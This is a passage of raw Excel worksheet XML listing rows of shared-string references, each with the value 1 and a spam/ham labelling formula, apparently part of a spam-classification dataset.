    <row r="708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A708" t="s">
        <v>21</v>
      </c>
      <c r="B708">
        <v>1</v>
      </c>
      <c r="C708" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A709" t="s">
        <v>21</v>
      </c>
      <c r="B709">
        <v>1</v>
      </c>
      <c r="C709" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A710" t="s">
        <v>21</v>
      </c>
      <c r="B710">
        <v>1</v>
      </c>
      <c r="C710" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A711" t="s">
        <v>530</v>
      </c>
      <c r="B711">
        <v>1</v>
      </c>
      <c r="C711" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A712" t="s">
        <v>531</v>
      </c>
      <c r="B712">
        <v>1</v>
      </c>
      <c r="C712" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A713" t="s">
        <v>532</v>
      </c>
      <c r="B713">
        <v>1</v>
      </c>
      <c r="C713" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A714" t="s">
        <v>533</v>
      </c>
      <c r="B714">
        <v>1</v>
      </c>
      <c r="C714" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A715" t="s">
        <v>534</v>
      </c>
      <c r="B715">
        <v>1</v>
      </c>
      <c r="C715" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A716" t="s">
        <v>21</v>
      </c>
      <c r="B716">
        <v>1</v>
      </c>
      <c r="C716" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A717" t="s">
        <v>21</v>
      </c>
      <c r="B717">
        <v>1</v>
      </c>
      <c r="C717" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A718" t="s">
        <v>21</v>
      </c>
      <c r="B718">
        <v>1</v>
      </c>
      <c r="C718" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A719" t="s">
        <v>535</v>
      </c>
      <c r="B719">
        <v>1</v>
      </c>
      <c r="C719" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A720" t="s">
        <v>21</v>
      </c>
      <c r="B720">
        <v>1</v>
      </c>
      <c r="C720" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A721" t="s">
        <v>21</v>
      </c>
      <c r="B721">
        <v>1</v>
      </c>
      <c r="C721" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A722" t="s">
        <v>21</v>
      </c>
      <c r="B722">
        <v>1</v>
      </c>
      <c r="C722" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A723" t="s">
        <v>21</v>
      </c>
      <c r="B723">
        <v>1</v>
      </c>
      <c r="C723" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A724" t="s">
        <v>21</v>
      </c>
      <c r="B724">
        <v>1</v>
      </c>
      <c r="C724" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A725" t="s">
        <v>21</v>
      </c>
      <c r="B725">
        <v>1</v>
      </c>
      <c r="C725" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A726" t="s">
        <v>21</v>
      </c>
      <c r="B726">
        <v>1</v>
      </c>
      <c r="C726" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A727" t="s">
        <v>536</v>
      </c>
      <c r="B727">
        <v>1</v>
      </c>
      <c r="C727" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A728" t="s">
        <v>537</v>
      </c>
      <c r="B728">
        <v>1</v>
      </c>
      <c r="C728" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A729" t="s">
        <v>538</v>
      </c>
      <c r="B729">
        <v>1</v>
      </c>
      <c r="C729" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A730" t="s">
        <v>539</v>
      </c>
      <c r="B730">
        <v>1</v>
      </c>
      <c r="C730" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A731" t="s">
        <v>540</v>
      </c>
      <c r="B731">
        <v>1</v>
      </c>
      <c r="C731" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A732" t="s">
        <v>541</v>
      </c>
      <c r="B732">
        <v>1</v>
      </c>
      <c r="C732" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A733" t="s">
        <v>21</v>
      </c>
      <c r="B733">
        <v>1</v>
      </c>
      <c r="C733" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A734" t="s">
        <v>21</v>
      </c>
      <c r="B734">
        <v>1</v>
      </c>
      <c r="C734" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A735" t="s">
        <v>542</v>
      </c>
      <c r="B735">
        <v>1</v>
      </c>
      <c r="C735" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A736" t="s">
        <v>543</v>
      </c>
      <c r="B736">
        <v>1</v>
      </c>
      <c r="C736" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A737" t="s">
        <v>544</v>
      </c>
      <c r="B737">
        <v>1</v>
      </c>
      <c r="C737" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A738" t="s">
        <v>545</v>
      </c>
      <c r="B738">
        <v>1</v>
      </c>
      <c r="C738" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A739" t="s">
        <v>21</v>
      </c>
      <c r="B739">
        <v>1</v>
      </c>
      <c r="C739" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A740" t="s">
        <v>546</v>
      </c>
      <c r="B740">
        <v>1</v>
      </c>
      <c r="C740" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A741" t="s">
        <v>547</v>
      </c>
      <c r="B741">
        <v>1</v>
      </c>
      <c r="C741" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A742" t="s">
        <v>548</v>
      </c>
      <c r="B742">
        <v>1</v>
      </c>
      <c r="C742" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A743" t="s">
        <v>21</v>
      </c>
      <c r="B743">
        <v>1</v>
      </c>
      <c r="C743" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A744" t="s">
        <v>549</v>
      </c>
      <c r="B744">
        <v>1</v>
      </c>
      <c r="C744" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A745" t="s">
        <v>550</v>
      </c>
      <c r="B745">
        <v>1</v>
      </c>
      <c r="C745" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A746" t="s">
        <v>551</v>
      </c>
      <c r="B746">
        <v>1</v>
      </c>
      <c r="C746" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A747" t="s">
        <v>538</v>
      </c>
      <c r="B747">
        <v>1</v>
      </c>
      <c r="C747" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A748" t="s">
        <v>552</v>
      </c>
      <c r="B748">
        <v>1</v>
      </c>
      <c r="C748" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A749" t="s">
        <v>553</v>
      </c>
      <c r="B749">
        <v>1</v>
      </c>
      <c r="C749" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A750" t="s">
        <v>554</v>
      </c>
      <c r="B750">
        <v>1</v>
      </c>
      <c r="C750" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A751" t="s">
        <v>555</v>
      </c>
      <c r="B751">
        <v>1</v>
      </c>
      <c r="C751" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A752" t="s">
        <v>556</v>
      </c>
      <c r="B752">
        <v>1</v>
      </c>
      <c r="C752" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A753" t="s">
        <v>557</v>
      </c>
      <c r="B753">
        <v>1</v>
      </c>
      <c r="C753" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A754" t="s">
        <v>558</v>
      </c>
      <c r="B754">
        <v>1</v>
      </c>
      <c r="C754" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A755" t="s">
        <v>559</v>
      </c>
      <c r="B755">
        <v>1</v>
      </c>
      <c r="C755" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A756" t="s">
        <v>560</v>
      </c>
      <c r="B756">
        <v>1</v>
      </c>
      <c r="C756" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A757" t="s">
        <v>21</v>
      </c>
      <c r="B757">
        <v>1</v>
      </c>
      <c r="C757" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A758" t="s">
        <v>561</v>
      </c>
      <c r="B758">
        <v>1</v>
      </c>
      <c r="C758" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A759" t="s">
        <v>21</v>
      </c>
      <c r="B759">
        <v>1</v>
      </c>
      <c r="C759" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A760" t="s">
        <v>21</v>
      </c>
      <c r="B760">
        <v>1</v>
      </c>
      <c r="C760" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A761" t="s">
        <v>562</v>
      </c>
      <c r="B761">
        <v>1</v>
      </c>
      <c r="C761" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A762" t="s">
        <v>563</v>
      </c>
      <c r="B762">
        <v>1</v>
      </c>
      <c r="C762" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A763" t="s">
        <v>564</v>
      </c>
      <c r="B763">
        <v>1</v>
      </c>
      <c r="C763" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A764" t="s">
        <v>565</v>
      </c>
      <c r="B764">
        <v>1</v>
      </c>
      <c r="C764" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A765" t="s">
        <v>566</v>
      </c>
      <c r="B765">
        <v>1</v>
      </c>
      <c r="C765" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A766" t="s">
        <v>567</v>
      </c>
      <c r="B766">
        <v>1</v>
      </c>
      <c r="C766" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A767" t="s">
        <v>107</v>
      </c>
      <c r="B767">
        <v>1</v>
      </c>
      <c r="C767" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A768" t="s">
        <v>107</v>
      </c>
      <c r="B768">
        <v>1</v>
      </c>
      <c r="C768" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A769" t="s">
        <v>568</v>
      </c>
      <c r="B769">
        <v>1</v>
      </c>
      <c r="C769" t="str">
        <f t="shared" si="11"/>
        <v>ham</v>
      </c>
    </row>
    <row r="770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A770" t="s">
        <v>569</v>
      </c>
      <c r="B770">
        <v>1</v>
      </c>
      <c r="C770" t="str">
        <f t="shared" ref="C770:C833" si="12">IF(B770="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A771" t="s">
        <v>570</v>
      </c>
      <c r="B771">
        <v>1</v>
      </c>
      <c r="C771" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A772" t="s">
        <v>571</v>
      </c>
      <c r="B772">
        <v>1</v>
      </c>
      <c r="C772" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A773" t="s">
        <v>572</v>
      </c>
      <c r="B773">
        <v>1</v>
      </c>
      <c r="C773" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A774" t="s">
        <v>573</v>
      </c>
      <c r="B774">
        <v>1</v>
      </c>
      <c r="C774" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A775" t="s">
        <v>574</v>
      </c>
      <c r="B775">
        <v>1</v>
      </c>
      <c r="C775" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A776" t="s">
        <v>575</v>
      </c>
      <c r="B776">
        <v>1</v>
      </c>
      <c r="C776" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A777" t="s">
        <v>21</v>
      </c>
      <c r="B777">
        <v>1</v>
      </c>
      <c r="C777" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A778" t="s">
        <v>21</v>
      </c>
      <c r="B778">
        <v>1</v>
      </c>
      <c r="C778" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A779" t="s">
        <v>576</v>
      </c>
      <c r="B779">
        <v>1</v>
      </c>
      <c r="C779" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A780" t="s">
        <v>21</v>
      </c>
      <c r="B780">
        <v>1</v>
      </c>
      <c r="C780" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A781" t="s">
        <v>21</v>
      </c>
      <c r="B781">
        <v>1</v>
      </c>
      <c r="C781" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A782" t="s">
        <v>577</v>
      </c>
      <c r="B782">
        <v>1</v>
      </c>
      <c r="C782" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A783" t="s">
        <v>578</v>
      </c>
      <c r="B783">
        <v>1</v>
      </c>
      <c r="C783" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A784" t="s">
        <v>579</v>
      </c>
      <c r="B784">
        <v>1</v>
      </c>
      <c r="C784" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A785" t="s">
        <v>21</v>
      </c>
      <c r="B785">
        <v>1</v>
      </c>
      <c r="C785" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A786" t="s">
        <v>567</v>
      </c>
      <c r="B786">
        <v>1</v>
      </c>
      <c r="C786" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A787" t="s">
        <v>580</v>
      </c>
      <c r="B787">
        <v>1</v>
      </c>
      <c r="C787" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A788" t="s">
        <v>581</v>
      </c>
      <c r="B788">
        <v>1</v>
      </c>
      <c r="C788" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A789" t="s">
        <v>582</v>
      </c>
      <c r="B789">
        <v>1</v>
      </c>
      <c r="C789" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A790" t="s">
        <v>583</v>
      </c>
      <c r="B790">
        <v>1</v>
      </c>
      <c r="C790" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A791" t="s">
        <v>584</v>
      </c>
      <c r="B791">
        <v>1</v>
      </c>
      <c r="C791" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A792" t="s">
        <v>585</v>
      </c>
      <c r="B792">
        <v>1</v>
      </c>
      <c r="C792" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A793" t="s">
        <v>586</v>
      </c>
      <c r="B793">
        <v>1</v>
      </c>
      <c r="C793" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A794" t="s">
        <v>21</v>
      </c>
      <c r="B794">
        <v>1</v>
      </c>
      <c r="C794" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A795" t="s">
        <v>587</v>
      </c>
      <c r="B795">
        <v>1</v>
      </c>
      <c r="C795" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A796" t="s">
        <v>588</v>
      </c>
      <c r="B796">
        <v>1</v>
      </c>
      <c r="C796" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A797" t="s">
        <v>21</v>
      </c>
      <c r="B797">
        <v>1</v>
      </c>
      <c r="C797" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A798" t="s">
        <v>589</v>
      </c>
      <c r="B798">
        <v>1</v>
      </c>
      <c r="C798" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A799" t="s">
        <v>590</v>
      </c>
      <c r="B799">
        <v>1</v>
      </c>
      <c r="C799" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A800" t="s">
        <v>591</v>
      </c>
      <c r="B800">
        <v>1</v>
      </c>
      <c r="C800" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A801" t="s">
        <v>592</v>
      </c>
      <c r="B801">
        <v>1</v>
      </c>
      <c r="C801" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A802" t="s">
        <v>593</v>
      </c>
      <c r="B802">
        <v>1</v>
      </c>
      <c r="C802" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A803" t="s">
        <v>594</v>
      </c>
      <c r="B803">
        <v>1</v>
      </c>
      <c r="C803" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A804" t="s">
        <v>595</v>
      </c>
      <c r="B804">
        <v>1</v>
      </c>
      <c r="C804" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A805" t="s">
        <v>596</v>
      </c>
      <c r="B805">
        <v>1</v>
      </c>
      <c r="C805" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A806" t="s">
        <v>597</v>
      </c>
      <c r="B806">
        <v>1</v>
      </c>
      <c r="C806" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A807" t="s">
        <v>598</v>
      </c>
      <c r="B807">
        <v>1</v>
      </c>
      <c r="C807" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A808" t="s">
        <v>599</v>
      </c>
      <c r="B808">
        <v>1</v>
      </c>
      <c r="C808" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A809" t="s">
        <v>21</v>
      </c>
      <c r="B809">
        <v>1</v>
      </c>
      <c r="C809" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A810" t="s">
        <v>21</v>
      </c>
      <c r="B810">
        <v>1</v>
      </c>
      <c r="C810" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A811" t="s">
        <v>600</v>
      </c>
      <c r="B811">
        <v>1</v>
      </c>
      <c r="C811" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A812" t="s">
        <v>601</v>
      </c>
      <c r="B812">
        <v>1</v>
      </c>
      <c r="C812" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A813" t="s">
        <v>602</v>
      </c>
      <c r="B813">
        <v>1</v>
      </c>
      <c r="C813" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A814" t="s">
        <v>603</v>
      </c>
      <c r="B814">
        <v>1</v>
      </c>
      <c r="C814" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A815" t="s">
        <v>21</v>
      </c>
      <c r="B815">
        <v>1</v>
      </c>
      <c r="C815" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A816" t="s">
        <v>604</v>
      </c>
      <c r="B816">
        <v>1</v>
      </c>
      <c r="C816" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A817" t="s">
        <v>21</v>
      </c>
      <c r="B817">
        <v>1</v>
      </c>
      <c r="C817" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A818" t="s">
        <v>605</v>
      </c>
      <c r="B818">
        <v>1</v>
      </c>
      <c r="C818" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A819" t="s">
        <v>606</v>
      </c>
      <c r="B819">
        <v>1</v>
      </c>
      <c r="C819" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A820" t="s">
        <v>607</v>
      </c>
      <c r="B820">
        <v>1</v>
      </c>
      <c r="C820" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A821" t="s">
        <v>608</v>
      </c>
      <c r="B821">
        <v>1</v>
      </c>
      <c r="C821" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A822" t="s">
        <v>609</v>
      </c>
      <c r="B822">
        <v>1</v>
      </c>
      <c r="C822" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A823" t="s">
        <v>610</v>
      </c>
      <c r="B823">
        <v>1</v>
      </c>
      <c r="C823" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
    </row>
    <row r="824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A824" t="s">
        <v>611</v>
      </c>
      <c r="B824">
        <v>1</v>
      </c>
      <c r="C824" t="str">
        <f t="shared" si="12"/>
        <v>ham</v>
      </c>
